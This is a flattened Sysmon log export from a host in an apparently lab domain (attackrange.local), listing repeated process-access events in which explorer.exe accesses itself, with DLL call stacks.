22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 